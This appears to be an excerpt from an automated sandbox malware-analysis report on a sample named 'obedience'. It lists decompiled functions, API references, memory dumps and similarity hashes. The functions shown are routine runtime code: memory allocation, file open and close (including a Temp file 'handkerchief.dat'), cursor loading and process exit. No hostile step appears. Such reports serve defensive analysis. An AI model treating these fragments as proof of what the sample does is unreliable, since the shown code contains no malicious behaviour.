      							L5:
      							__eflags =  *0x6edb04ec & 0x00000001;
      							if(( *0x6edb04ec & 0x00000001) == 0) {
      								 *0x6edb04ec =  *0x6edb04ec | 0x00000001;
      								__eflags =  *0x6edb04ec;
      								_push(1);
      								_v12 = "bad allocation"; // annotation: one-time construction of the static std::bad_alloc at 0x6edb04e0, guarded by bit 0 of 0x6edb04ec
      								L6ED95D00(0x6edb04e0,  &_v12);
      								 *0x6edb04e0 = 0x6eda6240;
      								E6ED96785( *0x6edb04ec, 0x6eda5911);
      							}
      							L7:
      							L6ED95E0D( &_v24, 0x6edb04e0); // annotation: copy-construct the exception object on the stack
      							_v24 = 0x6eda6240;
      							L6ED9902A( &_v24, 0x6edaa78c); // annotation: _CxxThrowException(&exc, throwinfo), per the APIs list below; does not return
      							asm("int3"); // annotation: padding after the noreturn call, never reached
      							goto L0;
      						}
      					}
      					L4:
      					return _t10;
      					L8:
      				}
      			}

      (per-line instruction addresses of the listing above, 0x6ed9629a to 0x6ed96315; entry at 0x6ed96310)

      APIs
      • _malloc.LIBCMT ref: 6ED962AA
        • Part of subcall function 6ED989A7: __FF_MSGBANNER.LIBCMT ref: 6ED989C0
        • Part of subcall function 6ED989A7: __NMSG_WRITE.LIBCMT ref: 6ED989C7
        • Part of subcall function 6ED989A7: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,?,?,6ED962AF,?,6ED91A9A,00000004,?), ref: 6ED989EC
      • std::exception::exception.LIBCMT ref: 6ED962DF
      • std::exception::exception.LIBCMT ref: 6ED962F9
      • __CxxThrowException@8.LIBCMT ref: 6ED9630A
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
      • String ID:
      • API String ID: 615853336-0
      • Opcode ID: 4f64d10d9cab9b23cdaa42f985f9338ed83d5b1e9722bd7f5043f8a7f3100c47
      • Instruction ID: 77e5d8407adff6357a2d62a5dc3e7e821e669f90f9ab150c06a2354569796828
      • Opcode Fuzzy Hash: 4f64d10d9cab9b23cdaa42f985f9338ed83d5b1e9722bd7f5043f8a7f3100c47
      • Instruction Fuzzy Hash: 7901DB71410109EEDB14DBEDCE05AEE376DAF82398F500455E5305A180FB70DA45A7E1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 58%
      			E0042D620(int _a4) {
      				void* __ebx;
      				void* __ebp;
      				signed int _t2;
      				signed int _t3;
      				void* _t7;
      				int _t8;
      				void* _t12;
      				void* _t13;
      				void* _t17;
      
      				_t8 = _a4;
      				if( *0x49092c == 0) {
      					 *0x490904 = E0042D52C(0, _t8, "GetSystemMetrics",  *0x490904, _t17); // annotation: user32!GetSystemMetrics resolved at run time (GetProcAddress in the subcall, per the APIs list below) and called through the cached pointer
      					_t7 =  *0x490904(_t8); // executed
      					return _t7;
      				}
      				_t3 = _t2 | 0xffffffff; // annotation: -1 means "no override, fall through to GetSystemMetrics"
      				_t12 = _t8 + 0xffffffb4 - 2; // annotation: nIndex - 76 - 2, a case table starting at SM_XVIRTUALSCREEN (76): the single-monitor emulation of xGetSystemMetrics from the Windows SDK's multimon.h, also in Delphi's MultiMon unit (editor's identification)
      				__eflags = _t12;
      				if(__eflags < 0) {
      					_t3 = 0; // annotation: SM_XVIRTUALSCREEN (76) / SM_YVIRTUALSCREEN (77) -> 0
      				} else {
      					if(__eflags == 0) {
      						_t8 = 0; // annotation: SM_CXVIRTUALSCREEN (78) -> query SM_CXSCREEN (0) instead
      					} else {
      						_t13 = _t12 - 1;
      						__eflags = _t13;
      						if(_t13 == 0) {
      							_t8 = 1; // annotation: SM_CYVIRTUALSCREEN (79) -> SM_CYSCREEN (1)
      						} else {
      							__eflags = _t13 - 0xffffffffffffffff;
      							if(_t13 - 0xffffffffffffffff < 0) {
      								_t3 = 1; // annotation: SM_CMONITORS (80) / SM_SAMEDISPLAYFORMAT (81) -> 1
      							}
      						}
      					}
      				}
      				__eflags = _t3 - 0xffffffff;
      				if(_t3 != 0xffffffff) {
      					return _t3;
      				} else {
      					return GetSystemMetrics(_t8);
      				}
      			}

      (per-line instruction addresses of the listing above, 0x0042d624 to 0x0042d689)

      APIs
      • GetSystemMetrics.USER32 ref: 0042D682
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      • KiUserCallbackDispatcher.NTDLL ref: 0042D648
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: AddressCallbackDispatcherMetricsProcSystemUser
      • String ID: GetSystemMetrics
      • API String ID: 54681038-96882338
      • Opcode ID: 2c8415d257762d1cb3895e5a95a1370ea859569dfe3ca5fa96d90518bad69465
      • Instruction ID: 91c61874e25910ba508526ca6d1b4ba87804e0891a7441964256ef56ad3ea793
      • Opcode Fuzzy Hash: 2c8415d257762d1cb3895e5a95a1370ea859569dfe3ca5fa96d90518bad69465
      • Instruction Fuzzy Hash: 3FF090F0F142285EF7104A38BD847333556D7A9330FE18B33E129862E6C67DAC45825D
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 86%
      			E6EDA2910(void* __edi, signed int _a8) {
      				intOrPtr _v0;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				intOrPtr _t17;
      				signed int _t18;
      				signed int _t19;
      				signed int _t22;
      				signed int _t25;
      				signed int _t27;
      				signed char _t28;
      				signed int _t31;
      				void* _t32;
      				signed int _t34;
      				void* _t38;
      
      				_t32 = __edi;
      				_pop(_t36);
      				_t27 = _a8;
      				_t25 = _t27 & 0x00000004;
      				_t31 = _t27 & 0x00000080;
      				_t17 = 1;
      				if((_t27 & 0x00000040) != 0) {
      					_t27 = _t27 | 1;
      				}
      				if((_t27 & 0x00000008) != 0) {
      					_t27 = _t27 | 0x00000002;
      				}
      				_t28 = _t27 & 0xffffff3b;
      				_t34 = 0;
      				while(_t17 != _t28) {
      					_t17 =  *((intOrPtr*)(0x6eda8ae0 + _t34 * 4));
      					_t34 = _t34 + 1;
      					if(_t17 != 0) {
      						continue;
      					}
      					break;
      				}
      				if( *((intOrPtr*)(0x6eda8adc + _t34 * 4)) != 0) {
      					__eflags = _t31;
      					if(_t31 == 0) {
      						L15:
      						_t18 = E6EDA2849(_v0, _t34, _a8); // executed
      						_t34 = _t18;
      						__eflags = _t34;
      						if(_t34 == 0) {
      							goto L9;
      						} else {
      							__eflags = _t25;
      							if(__eflags == 0) {
      								L19:
      								_t19 = _t34;
      							} else {
      								_push(2);
      								_push(0);
      								_push(_t34);
      								__eflags = L6EDA31D3(_t25, _t31, _t32, _t34, __eflags);
      								if(__eflags == 0) {
      									goto L19;
      								} else {
      									_push(_t34);
      									goto L14;
      								}
      							}
      						}
      					} else {
      						__eflags = _t28 & 0x0000000a;
      						if((_t28 & 0x0000000a) == 0) {
      							goto L15;
      						} else {
      							_t22 = E6EDA2849(_v0, 0, _a8);
      							_t38 = _t38 + 0xc;
      							__eflags = _t22;
      							if(__eflags == 0) {
      								goto L15;
      							} else {
      								_push(_t22);
      								L14:
      								E6ED972F8(_t25, _t31, _t32, _t34, __eflags);
      								goto L9;
      							}
      						}
      					}
      				} else {
      					L9:
      					_t19 = 0;
      				}
      				return _t19;
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: Xfsopenstd::_$_fseek
      • String ID:
      • API String ID: 1675860589-0
      • Opcode ID: efcfb3316fe657b493060ee15c47ca5db5c7d33bb2098f5b46f57346027c1b9f
      • Instruction ID: bf5f5079fbb94330dadbec6d5391e507747dc4ef553993bdab4aed219a237399
      • Opcode Fuzzy Hash: efcfb3316fe657b493060ee15c47ca5db5c7d33bb2098f5b46f57346027c1b9f
      • Instruction Fuzzy Hash: FE112333A4461AEBFB500BFFDD21BAB3688AB01798F040434FF559B594EA20C7128290
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 53%
      			E6ED94DE0(void* __edx, signed int _a4) {
      				intOrPtr _v8;
      				char _v16;
      				char _v20;
      				void* __ecx;
      				void* __edi;
      				void* __esi;
      				signed int _t16;
      				void* _t21;
      				void* _t25;
      				signed int _t30;
      				signed int _t37;
      				void* _t39;
      				void* _t48;
      				void* _t50;
      				signed int _t59;
      				void* _t61;
      				signed int _t64;
      
      				_t48 = __edx;
      				_push(0xffffffff);
      				_push(0x6eda5738);
      				_push( *[fs:0x0]);
      				_push(_t39);
      				_push(_t50);
      				_t16 =  *0x6edaf2a0; // 0x267b4ecc
      				_push(_t16 ^ _t64);
      				 *[fs:0x0] =  &_v16;
      				_t61 = _t39;
      				if( *((intOrPtr*)(_t61 + 0x54)) != 0) {
      					L9:
      					 *[fs:0x0] = _v16;
      					return 0;
      				} else {
      					_push(0x40);
      					_push(_a4);
      					_t21 = E6EDA2910(_t50, "C:\Users\jones\AppData\Local\Temp\handkerchief.dat"); // executed
      					if(_t21 == 0) {
      						goto L9;
      					} else {
      						E6ED94F60(_t61, _t21, _t48, 1);
      						_t25 = L6ED95550(_t61, _t21,  &_a4);
      						_v8 = 0;
      						L6ED951C0(L6ED95940(_t25), _t61);
      						_v8 = 0xffffffff;
      						_t37 = _a4;
      						if(_t37 != 0) {
      							L6EDA1ECB( &_v20, 0);
      							_t30 =  *(_t37 + 4);
      							if(_t30 != 0 && _t30 < 0xffffffff) {
      								 *(_t37 + 4) = _t30 - 1;
      							}
      							asm("sbb edi, edi");
      							L6EDA1EF3( &_v20);
      							_t59 =  !( ~( *(_t37 + 4))) & _t37;
      							if(_t59 != 0) {
      								 *((intOrPtr*)( *((intOrPtr*)( *_t59))))(1);
      							}
      						}
      						 *[fs:0x0] = _v16;
      						return _t61;
      					}
      				}
      			}

      APIs
        • Part of subcall function 6ED95550: std::_Lockit::_Lockit.LIBCPMT ref: 6ED95561
        • Part of subcall function 6ED95940: std::_Lockit::_Lockit.LIBCPMT ref: 6ED9596C
        • Part of subcall function 6ED95940: std::_Lockit::_Lockit.LIBCPMT ref: 6ED9598F
      • std::_Lockit::_Lockit.LIBCPMT ref: 6ED94E6A
      Strings
      • C:\Users\user\AppData\Local\Temp\handkerchief.dat, xrefs: 6ED94E18
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: LockitLockit::_std::_
      • String ID: C:\Users\user\AppData\Local\Temp\handkerchief.dat
      • API String ID: 3382485803-2248458510
      • Opcode ID: 9597a256390b9c7bb59997c705604590210d3b47e3e0b25bae2fb170f54cbe82
      • Instruction ID: 8960e896a09ebb5d90d2365182f15a751cbdf78fdd2c4e62f7f3996c6414ddda
      • Opcode Fuzzy Hash: 9597a256390b9c7bb59997c705604590210d3b47e3e0b25bae2fb170f54cbe82
      • Instruction Fuzzy Hash: F02192727046049FDB10CFA9CC80BADB3E9EB44724F104A69EA25DB3C1DB75EA0597A0
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
        • Part of subcall function 00401C1C: RtlInitializeCriticalSection.KERNEL32(004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C33
        • Part of subcall function 00401C1C: RtlEnterCriticalSection.KERNEL32(004905C8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C46
        • Part of subcall function 00401C1C: LocalAlloc.KERNEL32(00000000,00000FF8,004905C8,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401C70
        • Part of subcall function 00401C1C: RtlLeaveCriticalSection.KERNEL32(004905C8,00401CEB,00000000,00401CE4,?,00000000,?,00402642,00000000), ref: 00401CDE
      • RtlEnterCriticalSection.KERNEL32(004905C8,00000000,00402614), ref: 004024C1
      • RtlLeaveCriticalSection.KERNEL32(004905C8,0040261B), ref: 0040260E
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
      • String ID:
      • API String ID: 2227675388-0
      • Opcode ID: 6654d63cf1de98b99b606b5a026784bb319eaba7b001379ab83f034a0ff26c7e
      • Instruction ID: 437f76a5d116e02953adcd54d966f40abb264215bc7eb1a38964ba590944f2fe
      • Opcode Fuzzy Hash: 6654d63cf1de98b99b606b5a026784bb319eaba7b001379ab83f034a0ff26c7e
      • Instruction Fuzzy Hash: 3C5139B5A002099FDB50CF69DA84A6EB7F0FB98314F24817AD805B7391D378A951CF58
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E6ED91A60(void* __ecx, void* __edx, void* __esi, void* __eflags) {
      				intOrPtr _v8;
      				char _v12;
      				void* __ebx;
      				void* __edi;
      				void* __ebp;
      				intOrPtr* _t20;
      				intOrPtr _t21;
      				intOrPtr _t24;
      				void* _t25;
      				intOrPtr* _t27;
      				intOrPtr _t30;
      				void* _t34;
      
      				_t34 = __esi;
      				 *((intOrPtr*)(__esi + 0x30)) = 0;
      				 *((intOrPtr*)(__esi + 8)) = 0;
      				 *((intOrPtr*)(__esi + 0x10)) = 0;
      				 *((intOrPtr*)(__esi + 0x14)) = 0x201;
      				 *((intOrPtr*)(__esi + 0x18)) = 6;
      				 *((intOrPtr*)(__esi + 0x1c)) = 0;
      				 *((intOrPtr*)(__esi + 0x20)) = 0;
      				 *((intOrPtr*)(__esi + 0x24)) = 0;
      				 *((intOrPtr*)(__esi + 0x28)) = 0;
      				 *((intOrPtr*)(__esi + 0x2c)) = 0;
      				 *((intOrPtr*)(__esi + 0xc)) = 0;
      				_t20 = L6ED96290(__edx, 0, __esi, __eflags, 4);
      				_t27 = _t20;
      				_t38 = _t27;
      				if(_t27 == 0) {
      					 *((intOrPtr*)(__esi + 0x30)) = 0;
      					return _t20;
      				} else {
      					_t21 = E6EDA21D7(_t27, __edx, 0, __esi, _t38); // executed
      					 *_t27 = _t21;
      					_v8 = L6EDA1F96();
      					L6EDA1ECB( &_v12, 0);
      					_t30 = _v8;
      					_t24 =  *((intOrPtr*)(_t30 + 4));
      					if(_t24 < 0xffffffff) {
      						 *((intOrPtr*)(_t30 + 4)) = _t24 + 1;
      					}
      					_t25 = L6EDA1EF3( &_v12);
      					 *((intOrPtr*)(_t34 + 0x30)) = _t27;
      					return _t25;
      				}
      			}

      APIs
        • Part of subcall function 6ED96310: _malloc.LIBCMT ref: 6ED962AA
      • std::locale::_Init.LIBCPMT ref: 6ED91AA3
        • Part of subcall function 6EDA21D7: __EH_prolog3.LIBCMT ref: 6EDA21DE
        • Part of subcall function 6EDA21D7: std::_Lockit::_Lockit.LIBCPMT ref: 6EDA21F4
        • Part of subcall function 6EDA21D7: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6EDA2216
        • Part of subcall function 6EDA21D7: std::locale::_Setgloballocale.LIBCPMT ref: 6EDA2220
        • Part of subcall function 6EDA21D7: _Yarn.LIBCPMT ref: 6EDA2236
      • std::_Lockit::_Lockit.LIBCPMT ref: 6ED91AB6
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: std::locale::_$LockitLockit::_std::_$H_prolog3InitLocimpLocimp::_SetgloballocaleYarn_malloc
      • String ID:
      • API String ID: 385601912-0
      • Opcode ID: 73ee569acaafc9ecaacb2611f9c02dbacfc9f2e4a85841f2bb523addd8ee6267
      • Instruction ID: ac7774d132391ad9adf79daf130dc0b20a1208863efa69762f47a992a44b2754
      • Opcode Fuzzy Hash: 73ee569acaafc9ecaacb2611f9c02dbacfc9f2e4a85841f2bb523addd8ee6267
      • Instruction Fuzzy Hash: C11121B1900B049FC720DFABD98055AFBF8FF95314B104B5FC95A87A50D7B1A60ACB91
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00462164(void* __eax) {
      				struct HICON__* _t5;
      				void* _t7;
      				void* _t8;
      				struct HINSTANCE__* _t11;
      				CHAR** _t12;
      				void* _t13;
      
      				_t13 = __eax;
      				 *((intOrPtr*)(_t13 + 0x60)) = LoadCursorA(0, 0x7f00);
      				_t8 = 0xffffffea;
      				_t12 = 0x48eeb4;
      				do {
      					if(_t8 < 0xffffffef || _t8 > 0xfffffff4) {
      						if(_t8 != 0xffffffeb) {
      							_t11 = 0;
      						} else {
      							goto L4;
      						}
      					} else {
      						L4:
      						_t11 =  *0x490664; // 0x400000
      					}
      					_t5 = LoadCursorA(_t11,  *_t12); // executed
      					_t7 = E004622A4(_t13, _t5, _t8);
      					_t8 = _t8 + 1;
      					_t12 =  &(_t12[1]);
      				} while (_t8 != 0xffffffff);
      				return _t7;
      			}

      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CursorLoad
      • String ID:
      • API String ID: 3238433803-0
      • Opcode ID: ce4fd5f14f72f2e6f9e38551c1d122c1e601436f3e97dedd7963cb121c9a847f
      • Instruction ID: 18bdd2f485cb405d7b350cbfba75d23e3275ef188cabeec006cd0d919494e6e5
      • Opcode Fuzzy Hash: ce4fd5f14f72f2e6f9e38551c1d122c1e601436f3e97dedd7963cb121c9a847f
      • Instruction Fuzzy Hash: 70F05E12E08A143B9620253E4DC1AAA7259DBD3334B20433BFA29972D1E6696C02425B
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 89%
      			E6ED972F8(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				signed int _t20;
      				signed int _t22;
      				intOrPtr _t32;
      				void* _t33;
      				intOrPtr _t35;
      
      				_push(0xc);
      				_push(0x6edaa080);
      				L6ED99460(__ebx, __edi, __esi);
      				 *(_t33 - 0x1c) =  *(_t33 - 0x1c) | 0xffffffff;
      				_t32 =  *((intOrPtr*)(_t33 + 8));
      				_t35 = _t32;
      				_t36 = _t35 != 0;
      				if(_t35 != 0) {
      					__eflags =  *(_t32 + 0xc) & 0x00000040;
      					if(( *(_t32 + 0xc) & 0x00000040) == 0) {
      						E6ED96B4F(_t32);
      						 *(_t33 - 4) =  *(_t33 - 4) & 0x00000000;
      						_t20 = E6ED9728B(__ebx, __edx, _t32); // executed
      						 *(_t33 - 0x1c) = _t20;
      						 *(_t33 - 4) = 0xfffffffe;
      						L6ED97364(_t32);
      					} else {
      						_t9 = _t32 + 0xc;
      						 *_t9 =  *(_t32 + 0xc) & 0x00000000;
      						__eflags =  *_t9;
      					}
      					_t22 =  *(_t33 - 0x1c);
      				} else {
      					 *((intOrPtr*)(E6ED987F9(_t36))) = 0x16;
      					_t22 = E6ED987A7() | 0xffffffff;
      				}
      				return L6ED994A5(_t22);
      			}

      APIs
        • Part of subcall function 6ED987F9: __getptd_noexit.LIBCMT ref: 6ED987F9
      • __lock_file.LIBCMT ref: 6ED9733F
        • Part of subcall function 6ED96B4F: __lock.LIBCMT ref: 6ED96B74
      • __fclose_nolock.LIBCMT ref: 6ED9734A
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
      • String ID:
      • API String ID: 2800547568-0
      • Opcode ID: 2d91fbeb197e75d1fb81696b3e1276d8e932622e8292a323aeddc90cdf583fce
      • Instruction ID: a952f83f78b53562920816ecdd602206764e81ff4730c182250b985610741f7a
      • Opcode Fuzzy Hash: 2d91fbeb197e75d1fb81696b3e1276d8e932622e8292a323aeddc90cdf583fce
      • Instruction Fuzzy Hash: 7CF09A30811705EED7609BF9DC017DE7BA86F01739F208B08D874AA1D0DB789A01ABA9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E6ED967C7(int _a4) {
      
      				E6ED9679C(_a4);
      				ExitProcess(_a4);
      			}

      APIs
      • ___crtCorExitProcess.LIBCMT ref: 6ED967CF
        • Part of subcall function 6ED9679C: GetModuleHandleW.KERNEL32(mscoree.dll,?,6ED967D4,6ED962AF,?,6ED999F8,000000FF,0000001E,6EDAA1B0,0000000C,6ED99AA3,6ED962AF,6ED962AF,?,6ED981D9,0000000D), ref: 6ED967A6
        • Part of subcall function 6ED9679C: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6ED967B6
      • ExitProcess.KERNEL32 ref: 6ED967D8
      Memory Dump Source
      • Source File: 00000001.00000002.248376246.000000006ED91000.00000020.00000001.01000000.00000005.sdmp, Offset: 6ED90000, based on PE: true
      • Associated: 00000001.00000002.248363600.000000006ED90000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248407767.000000006EDA6000.00000002.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248432263.000000006EDAF000.00000004.00000001.01000000.00000005.sdmp
      • Associated: 00000001.00000002.248475191.000000006EDB3000.00000002.00000001.01000000.00000005.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_6ed90000_obedience.jbxd
      Yara matches
      Similarity
      • API ID: ExitProcess$AddressHandleModuleProc___crt
      • String ID:
      • API String ID: 2427264223-0
      • Opcode ID: 80cd05067be819e5eb950a893e5d5338335e8770e172e115a4e1dcad8188f008
      • Instruction ID: c1829fa293f6e591766aba2874ba74751bb9a5f5ad6f9e6bcda3df97c396ada8
      • Opcode Fuzzy Hash: 80cd05067be819e5eb950a893e5d5338335e8770e172e115a4e1dcad8188f008
      • Instruction Fuzzy Hash: 22B09231010608FBEF012F6ADC0988E3F7AEB812A0B104020F82909030DF72AED2EAD4
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040167C(void* __eax, void** __edx) {
      				void* _t3;
      				void** _t8;
      				void* _t11;
      				long _t14;
      
      				_t8 = __edx;
      				if(__eax >= 0x100000) {
      					_t14 = __eax + 0x0000ffff & 0xffff0000;
      				} else {
      					_t14 = 0x100000;
      				}
      				_t8[1] = _t14;
      				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
      				_t11 = _t3;
      				 *_t8 = _t11;
      				if(_t11 != 0) {
      					_t3 = E004014A0(0x4905e8, _t8);
      					if(_t3 == 0) {
      						VirtualFree( *_t8, 0, 0x8000);
      						 *_t8 = 0;
      						return 0;
      					}
      				}
      				return _t3;
      			}

      APIs
      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401A0F), ref: 004016AB
      • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401A0F), ref: 004016D2
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Virtual$AllocFree
      • String ID:
      • API String ID: 2087232378-0
